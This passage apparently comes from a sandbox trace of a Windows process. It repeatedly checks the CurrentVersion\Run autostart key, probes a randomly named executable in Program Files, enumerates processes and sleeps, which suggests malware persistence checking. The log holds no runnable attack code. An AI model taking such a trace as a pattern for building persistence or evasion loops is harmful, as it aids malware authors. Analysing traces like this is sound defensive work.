FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.035] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.040] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.047] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.047] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.047] NtClose (Handle=0x14c) returned 0x0 [0176.047] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.048] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.048] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.048] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.048] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.048] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.052] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.063] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.063] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.063] NtClose (Handle=0x14c) returned 0x0 [0176.063] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.063] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.063] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.063] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.063] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.063] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.067] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.080] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.080] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.080] NtClose (Handle=0x14c) returned 0x0 [0176.080] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.080] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.080] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.080] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.080] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.081] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.085] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.124] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.124] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.124] NtClose (Handle=0x14c) returned 0x0 [0176.125] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.125] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.125] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.125] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.125] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.125] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.129] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.165] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.165] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.165] NtClose (Handle=0x14c) returned 0x0 [0176.165] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.165] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.165] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.165] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.165] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.165] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.169] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.183] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.183] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.184] NtClose (Handle=0x14c) returned 0x0 [0176.184] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.184] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.184] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.184] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.184] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.184] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.206] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.221] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.221] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.221] NtClose (Handle=0x14c) returned 0x0 [0176.221] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.221] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, 